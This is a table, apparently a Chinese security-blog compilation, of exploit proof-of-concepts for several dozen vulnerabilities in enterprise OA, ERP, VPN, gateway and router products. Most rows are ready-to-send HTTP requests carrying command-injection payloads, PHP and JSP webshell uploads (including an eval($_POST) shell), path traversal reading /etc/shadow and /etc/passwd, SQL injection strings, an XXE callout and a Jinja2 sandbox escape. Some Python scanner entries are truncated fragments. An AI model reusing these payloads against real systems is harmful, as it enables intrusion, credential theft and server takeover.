| AJ-Report开源数据大屏存在远程命令执行漏洞 | POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/json;charset=UTF-8 Connection: close {“ParamName”:””,”paramDesc”:””,”paramType”:””,”sampleItem”:”1″,”mandatory”:true,”requiredFlag”:1,”validationRules”:”function verification(data){a = new java.lang.ProcessBuilder(\”id\”).start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss=”;while((line = r.readLine()) != null){ss+=line};return ss;}”} |
| Apache ActiveMQ远程命令执行漏洞 | https://github.com/Hutt0n0/ActiveMqRCE |
| APP分发签名系统index-uplog.php存在任意文件上传漏洞 | POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 290 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryfF7NbGp0PAFq8Mkd Host: 127.0.0.1 Origin: http://127.0.0.1 Referer: http://127.0.0.1/source/pack/upload/2upload/index-uplog.php Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 sec-ch-ua: “Google Chrome”;v=”125″, “Chromium”;v=”125″, “Not.A/Brand”;v=”24″ sec-ch-ua-mobile: ?0 sec-ch-ua-platform: “Windows” sec-fetch-user: ?1 ——WebKitFormBoundary03rNBzFMIytvpWhy 1-2 <?php phpinfo();?> |
| Array VPN任意文件读取漏洞 | GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd Dnt: 1 Upgrade-Insecure-Requests: 1 Connection: close |
| Check-Point安全网关任意文件读取漏洞(CVE-2024-24919) | POST /clients/MyCRL HTTP/1.1 Host: ip Content-Length: 39 aCSHELL/../../../../../../../etc/shadow |
| Confluence远程命令执行漏洞(CVE-2024-21683) | POST /admin/plugins/newcode/addlanguage.action HTTP/2 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 372 Content-Type: multipart/form-data; boundary=f6dae662e22371daece5ff851b1c4a39 –f6dae662e22371daece5ff851b1c4a39 test new java.lang.ProcessBuilder[“(java.lang.String[])”]([“ping 5hnlyo.dnslog.cn”]).start() |
| Coremail邮件系统未授权访问获取管理员账密 | /coremail/common/assets/;/;/;/;/;/;/s?__biz=MzI3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2 |
| D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113) | /getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 |
| H3C Magic B1STV100R012 RCE | POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 1569 Content-Type: application/x-www-form-urlencoded pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami |
| H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞 | POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 Host: 127.0.0.1 User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE) Content-Length: 1573 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami |
| H3C-CVM-upload接口前台任意文件上传漏洞 | POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp&name=123 HTTP/1.1 Host: your-ip Content-Range: bytes 0-10/20 Referer: http://your-ip/cas/login Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 <%out.println(“test”);%> |
| H3C-SecParh堡垒机任意用户登录漏洞 | /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin |
| H3C网络管理系统任意文件读取漏洞 | GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1 |
| H3C-校园网自助服务系统flexfileupload任意文件上传漏洞 | POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=—————WebKitFormBoundaryMmx988TUuintqO4Q Accept-Encoding: gzip Content-Length: 243 —————–WebKitFormBoundaryMmx988TUuintqO4Q 1111 |
| 锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞 | /view/vpn/autovpn/online_check.php?peernode= | `echo PD9waHAgcGhwaW5mbygpOw== | base64 -d > 1.php` |
| ⻜企互联loginService任意登录 | /loginService.fe?op=D |
| 安恒明御安全网关远程命令执行漏洞 | GET /webui/?g=aaa_portal_auth_config_reset&type=echo ‘<?php echo “assdwdmpidmsbzoabahpjhnokiduw”; phpinfo(); ?>’ >> /usr/local/webui/txzfsrur.php |
| JumpServer(CVE-2024-29202)Jinin2模板注入漏洞 | [{ “name”: “RCE playbook”, “hosts”: “all”, “tasks”: [ { “name”: “this runs in Celery container”, “shell”: “id > /tmp/pwnd”, “\u0064elegate_to”: “localhost” } ], “vars”: { “ansible_\u0063onnection”: “local” } }] |
| JumpServer(CVE-2024-29201)远程代码执行漏洞 | – name: | {% for x in ().__class__.__base__.__subclasses__() %} {% if “warning” in x.__name__ %} {{ x()._module.__builtins__[“__import__”](“os”).system(“id > /tmp/pwnd2”) }} {%endif%} {%endfor%} |
| 泛微ecology SQL注入漏洞 | 未知 |
| 泛微ecology SSRF漏洞 | 未知 |
| 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞 | POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 Host: User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: application/x-www-form-urlencoded filename=../webapps/ROOT/WEB-INF/web.xml |
| 汇智ERP-filehandle.aspx存在任意文件读取漏洞 | GET /nssys/common/filehandle.aspx?filepath=C%3a%2fwindows%2fwin%2eini HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 金和OA C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞 | /C6/Jhsoft.Web.appraise/GeneralXmlhttpPage.aspx/?type=CheckAppraiseState&id=1* |
| H3C密码泄露漏洞 | import requests import urllib3 from urllib.parse import urlparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
| H3C集团官网某处任意用户登录漏洞 | 未知 |
| 海康威视教育综合安防管理系统admintoken泄露 | /portal/conf/config.properties |
| 海康威视视频监控管理后台垂直越权 | 未知 |
| 锐捷EG350易网关管理系统存在信息泄露漏洞 | /tool/shell/nginx.conf |
| 锐捷M18000-WS-ED无线控制器存在CRL命令注入 | POST /web_config.do HTTP/1.1
command=show+running-config&mode_url=exec |
| 锐捷RG-NBS2026G-P交换机存在未授权访问漏洞 | /system/passwdManage.htm |
| WebLogic Server 远程代码执行漏洞(XVE-2024-4789) | 未知 |
| 泛微OA E-Office V10 OfficeServer 任意文件上传 | /eoffice10/server/public/iWebOffice2015/OfficeServer.php User – Agent’:’Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0′ Content – Length’:’393′ Content – Type’: ‘multipart / form – data; boundary = —-WebKitFormBoundaryJjb5ZAJOOXO7fwjs Accept – Encoding’: ‘gzip, deflate’ Connection’:’close ——WebKitFormBoundaryJjb5ZAJOOXO7fwjs <?php phpinfo();unlink(__FILE__);?> |
| 广联达-Linkworks-GetAllData接口存在未授权访问 | POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-P585Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Content-Length: 32 Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Token=!@#$asdf$#@!&DataType=user |
| 网康 NS-ASG sql 注入漏洞 | POST /admin/list_addr_fwresource_ip.php HTTP/1.1 Host: ip:port Cookie: PHPSESSID=f30e8a16a1b6373bbc11e1ce84445033 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/110.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 29 Origin: https://ip:port Referer: https://ip:port/admin/list_addr_fwresource_ip.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close ResId%5B%5D=13*&action=delete |
| 网康 NS-ASG 信息泄露漏洞 | /configsave/manufacture-default.tar.gz |
| 西软云XMS-futurehotel/operate接口存在XXE漏洞 | POST /XopServerRS/rest/futurehotel/operate HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36 Connection: close Content-Type: text/xml Accept-Encoding: gzip <!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://xxx.dnslog.cn”> %remote;]> |
| 云时空商业ERP文件上传 | import requests
def verify(ip): url = f'{ip}/uploads/pics/2023-12-6/test.jsp’ headers = { payload = ”’ <% out.println(“This website has a vulnerability”); %> try: except Exception as e: if __name__ == ‘__main__’: |
| 用友U9-UMWebService.asmx存在文件读取漏洞 | POST /u9/OnLine/UMWebService.asmx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Connection: close Content-Length: 381 Content-Type: text/xml; charset=utf-8 SOAPAction: “http://tempuri.org/GetLogContent” Accept-Encoding: gzip <?xml version=”1.0″ encoding=”utf-8″?> |
| 用友u8-cloud RegisterServlet SQL注入 | import requests
def verify(ip): except Exception as e: if __name__ == ‘__main__’: |
| 用友 NC Cloud jsinvoke 任意文件上传 | import requests
def verify(ip): url = f'{ip}/uapjs/jsinvoke/?action=invoke’ headers = { payload = ”’ try: except Exception as e: if __name__ == ‘__main__’: |
| 用友NC任意文件读取 | import requests import concurrent.futures def check_vulnerability(target): try: res = requests.get(fr”http://{target}/portal/pt/xml/file/download?pageId=login&filename=..\index.jsp”, headers=headers, data=r”decorator=%2FWEB-INF%2Fweb.xml&confirm=true”, timeout=5) # 使用线程池并发执行检查漏洞 |
| 用友U8cloud-MeasureQueryFrameAction存在SQL注入漏洞 | /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:3%27–+ |
| 易宝OA ExecuteSqlForSingle SQL注入漏洞 | import requests import concurrent.futures def check_vulnerability(target): headers = { if __name__ == “__main__”: # 使用线程池并发执行检查漏洞 |
| 万户ezoffice wpsservlet任意文件上传 | import requests
def verify(ip): url = f'{ip}/defaultroot/platform/portal/layout/check.jsp’ headers = { payload = ”’ <% out.print(“This website has a vulnerability!!!”);%> try: except Exception as e: if __name__ == ‘__main__’: |
| 好视通视频会议系统存在任意文件读取漏洞 | import requests import concurrent.futures def check_vulnerability(target): “User-Agent”: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)”, if __name__ == “__main__”: with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor: |
| JeePlus快速开发平台resetpassword存在SQL注入漏洞 | /kjds2022/a/sys/user/resetPassword?mobile=18888888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23 |
| Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793 | DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1 POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1 POST /app/rest/debug/processes?exePath=id&parms=-a HTTP/1.1 |
| 泛微E-cology9 browserjsp SQL注入漏洞 | import argparse import requests from termcolor import colored import signal requests.packages.urllib3.disable_warnings() def check_url(url, output=None): data = { try: if “show2” in content: if output: print(result) # 即时打印结果 except requests.exceptions.RequestException as e: def check_urls_from_file(filename, output=None): for url in url_list: # 捕获中断信号 def handle_interrupt(signum, frame): # 在捕获中断时保存当前扫描结果,并关闭文件 print(“\n扫描已中断并保存当前结果。”) def main(): parser = argparse.ArgumentParser(description=’CNVD-2023-12632检测POC’) if args.output: if args.url: # 注册捕获中断信号的处理程序 # 关闭输出文件 |
| 捷诚管理信息系统 SQL注入漏洞 | import time import requests def verify(ip): except Exception as e: if __name__ == ‘__main__’: |
| 禅道研发项⽬管理系统未授权 | import requests
def check(url): headers2 = { data1 = ‘product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=’ |
| 科荣 AIO 管理系统任意文件读取 | import base64 import requests def poc(ip, file_path): # 构造URL地址 if __name__ == ‘__main__’: |
| F-logic DataCube3存在命令执行漏洞(CVE-2024-7066) | POST /admin/config_time_sync.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 116 Content-Type: application/x-www-form-urlencoded Cookie: SESS_IDS=24ef0vbucnke26mtreijnfumve Host: x.x.x.x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1 |
| todesk config.ini算法缺陷可被猜解导致rce | 未知 |
| 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞 | GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Connection: close |
| 安恒明御安全网关rce | GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+” <%3fphpteval(\$_POST[\”a\”]) ;?>”+>+.xxx.php HTTP/1.1 Host: xxx Cookie: USGSESSID=495b895ddd42b82cd89a29f241825081 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 泛微 ecology9 OA 系统SQL注入老洞 | weaver/weaver.email.FileDownloadLocation?download=1&fileid=-2%20or%201=1 |
| 赛蓝企业管理系统DownloadBuilder任意文件读取漏洞 | GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close |
| 帆软报表 channel 远程命令执行漏洞 | POST /webroot/decision/remote/design/channel HTTP/1.1 Content-Type: application/json Host: cmd: id Connection: close {{gzip(file(fine10.bin))}} |
| 山石网科云鉴存在前台任意命令执行漏洞 | import requests ”’ HSVD-2023-0008 ”’ def setSystemTimeAction(newcsrf,headers): url = “https://192.168.199.221/master/ajaxActions/setSystemTimeAction.php?token_csrf=”+newcsrf proxies = {‘https’:’http://127.0.0.1:8080′} x = “param=os.system(‘id > /opt/var/majorsec/installation/master/runtime/img/config’)” #req2 = requests.post(url2, data=x, proxies=proxies, verify=False, headers=headers) req2 = requests.post(url, data=x,headers=headers, verify=False) ”’ def main(): if __name__ == ‘__main__’: |
| 山石网科堡垒机存在远程代码执行漏洞0day(实际为去年老洞) | 山石运维安全网关是集运维管理与运维审计为一体的堡垒机设备,实现对核心资产的统一认证、统一授权、统一审计,全方位提升运维风险控制能力。由于该软件的 Web 应用对用户的输入未进行有效过滤,直接拼接系统命令执行,造成了远程代码执行漏洞。攻击者可通过构造恶意请求,拼接命令执行任意代码,控制服务器。 |
| 百易云-资产管理运营系统-任意文件上传 | POST /comfileup.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Type: multipart/form-data; boundary=——–1110146050 ———-1110146050 <?php system(“whoami”);unlink(__FILE__);?> |
| 广州图创-图书馆集群管理系统-PermissionAC | /interlibSSO/api/BrowseLogInterface?cmdACT=doDataFlowLogStatistic4ERM&sysid=1 |
| 华天动力-OA-downloadWpsFile任意文件读取 | GET /OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/2 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip, deflate |
| 金慧-综合管理信息系统-SQL注入 | POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl= |
| 九思-OA-任意文件上传 | /jsoa/wpsforlinux/src/upload_l.jsp?openType= |
| 金蝶-云星空-SQL注入 | /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.Account.AccountService.GetDataCenterList.common.kdsvc |
| T18-1TOTOLINK-A6000R-RCE | GET /cgi-bin/luci/admin/mtk/webcmd?cmd=ls%20/>/www/555.txt HTTP/1.1 Host: 192.168.187.136 Connection: close Cache-Control: max-age=0 sec-ch-ua: “Not/A)Brand”;v=”8″, “Chromium”;v=”126″, “Google Chrome”;v=”126″ sec-ch-ua-mobile: ?0 sec-ch-ua-platform: “Windows” Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: sysauth=80c79bd6ad9bfba9656b7a8bee2a988f |
| 拓尔思-TRSWAS5.0-PermissionAC文件上传 | /mas/servlets/uploadThumb?appKey=sv&uploading=1 |
| 紫光-电子档案管理系统-PermissionAC | /Archive/ErecordOffice/openOfficeFile |
| 科迅-一卡通管理系统-SQL注入 | GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27– HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
